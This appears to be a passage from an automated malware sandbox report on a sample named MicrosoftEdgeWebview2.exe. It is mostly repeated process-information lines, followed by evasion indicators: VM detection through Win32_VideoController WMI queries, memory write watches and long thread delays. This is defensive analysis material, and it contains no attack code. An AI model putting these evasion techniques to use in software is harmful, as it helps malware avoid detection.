            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeMemory allocated: 1ABA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMemory allocated: 11C0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMemory allocated: 1ACB0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMemory allocated: 25E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMemory allocated: 1A850000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMemory allocated: 1240000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMemory allocated: 1AF40000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMemory allocated: 2580000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMemory allocated: 1A6F0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMemory allocated: F10000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMemory allocated: 1AA60000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeWindow / User API: threadDelayed 2411Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeWindow / User API: threadDelayed 7368Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6146Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3562Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6800Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2905Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7574Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2016Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7018
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2581
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe TID: 8120Thread sleep time: -23980767295822402s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572Thread sleep count: 7574 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep count: 2016 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1852Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe TID: 3940Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe TID: 7840Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe TID: 8004Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe TID: 8084Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeLast function: Thread delayed
